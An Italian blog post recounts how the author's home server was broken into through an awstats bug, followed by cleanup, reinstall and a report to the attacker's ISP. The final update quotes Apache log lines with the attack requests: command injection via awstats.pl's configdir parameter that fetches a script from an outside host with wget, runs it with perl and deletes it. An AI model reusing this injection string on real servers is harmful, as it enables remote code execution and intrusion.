Cracked!

Start pagina | Aantekeningen |  NederlandsHulpbronnen | Zoek
Home page | CommentsNetherlandsResources | Search
 
 
 

Cracked!

E' un tranquillo sabato mattina, piovoso e ventoso, ergo mi sto preparando per una bella colazione tranquilla seguita da una giornata di cazzeggiamento.

Mentre mi sorbisco il caffe' avvio il portatile e do' un'occhiata alla mia posta, oltre alle varie cavolate ci sono solo due mail "utili". Una e' il rapportino del backup giornaliero e la seconda e' il rapportino dell'analisi dei log. Ed e' questa che mi rovinera' la giornata.

Mi scorro la mail... solite cretinate nel log del firewall, soliti tentativi di fare login via ssh con utenti inesistenti... poi...

newuser: ymcx

A questo punto immaginatevi me, con gli occhi fuori dalle orbite ed il caffe' che mi erutta dalle orecchie... poi immaginatevi sempre me che scavalcato il tavolo di cucina (che non e' tanto difficile da scavalcare ma manco tanto facile) mi scapicollo su' per le scale, arrivo in soffitta dove ho il server e sradico di netto il cavo di rete dal server.

Seguono un buon numero di bestemmie e maledizioni varie.

Dopo di che ho portato il server dabbasso, ho finito di fare colazione (che tanto oramai non c'e' piu' da agitarsi) ed ho cominciato una vivisezione di quello che c'era sul server stesso.

Allora, da quello che sono riuscito a stabilire "l'amico" e' entrato usando un bug di awstats. Tale bug e' stato segnalato tempo addietro, ma io manco mi ricordavo di averlo installato sto' coso.

Comunque, dal log delle attivita' di apache risulta che hanno utilizzato questo bug per copiare ed eseguire un'eseguibile sul server ed aggiungere l'utente 'ymcx'. Poi pero' devono avere fatto una qualche cretinata perche' a parte questo non e' successo altro.

In ogni caso, meglio essere sicuri che no, quindi ho proceduto a re-installare da zero tutta la macchina, ripristinato i file di configurazione che mi interessavano, ripristinato i dati ed aggiornato awstats (pare che la versione 6.3 non sia vulnerabile).

In totale una mezza giornata di lavoro per il tutto.

Il che mi ha confermato che: 1) l'analisi dei log e' una buona cosa e 2) i backup non fanno mai male e 3) c'e' sempre qualche TDC la' fuori...

UPDATE

E cosi' giunse la domenica pomeriggio. Dopo aver cazzeggiato piu' o meno tutto il sabato tra regole di firewall e logging.

Ed e' a questo punto che il nostro eroe (io) si ricorda di un piccolo particolare. Il mio ISP mi fornice una miseranda casella di posta. Che io sostanzialmente non ho mai usato in vita mia. Ma tale casella mi serve per ricevere notizie relative all'hosting stesso.

Percui decido di ripristinare anche la parte relativa a quell'affare e di resuscitare fetchmail per scaricare quella posta.

Metto insieme il .fetchmailrc ad uopo e lancio.

Scarica i messaggi... 10, 20, 30, 40.... 50,.... 60, ............ (io penso: ellamadonna quanto ci mette) ...70, ............... 80, (io penso: sta diventando un po' troppo lento.. o sono io?) 90 .......... Error: local MTA refused connection.

Hu? Che e' sta cosa?

Cosi' scopro che il server e' di una lentezza allucinante... uptime. (io penso: hummm... load average 86, non suona troppo bene). Ma quanta accidenti di posta ho?

Cosi' decido di guardare via web-mail: 7300 messaggi!

Ooooookkkey, scaricare ed inoltrare nella mia casella tramite spamassassin non e' un'opzione. Si procede all'opzione 2: inoltrare direttamente in /dev/null.

Nonostante l'immediata cestinazione ci ho messo un bel 3 ore e passa a scaricare tutta l'immondizia.

UPDATE (2)

Dopo tutto il marasma ho avuto il tempo di controllarmi per benino i log, ieri pomeriggio ri-controllo e che ti trovo?

HTTP/1.0" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
200.193.248.219 - - [15/Feb/2005:04:22:27 +0100] "POST 
/cgi-bin/awstats.pl?configdir=|echo%20;echo%20;cd%20/tmp;%20wget%20
www.commandt.org/a;%20perl%20a;%20rm%20a;echo%20;echo| 
HTTP/1.0" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
200.193.248.219 - - [15/Feb/2005:04:27:13 +0100] "POST 
/cgi-bin/awstats/awstats.pl?configdir=|echo%20;echo%20;cd%20/tmp;%20wget%
20www.commandt.org/a;%20perl%20a;%20rm%20a;echo%20;echo| 
HTTP/1.0" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
200.193.248.219 - - [15/Feb/2005:04:28:03 +0100] "POST 
/cgi-bin/awstats/awstats.pl?configdir=|echo%20;echo%20;cd%20/tmp;
%20wget%20www.commandt.org/a;%20perl%20a;%20rm%20a;echo%20;echo| 
HTTP/1.0" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
200.193.248.219 - - [15/Feb/2005:04:32:15 +0100] "POST 
/awstats.pl?configdir=|echo%20;echo%20;cd%20/tmp;%20wget%20ww
E cosi' via... Ok, chi e' questo '200.193.248.219'? Oh, bene.. e parte una mail diretta al loro ISP. Ed oggi ho ricevuto risposta che stanno "investigando"... e vedremo se faranno qualche cosa oppure no.

Davide
14/02/2005 00:00

Davide Bianchi
14/02/2005 00:00

Torna all'elenco Previous  Next

No messages this document does not accept new posts
Copyright (C) Davide Bianchi 2000/2010 - davide AT onlyforfun.net, ICQ: 268751033, Jabber: davideyeahsure AT gmail.com Skype: davideyahsure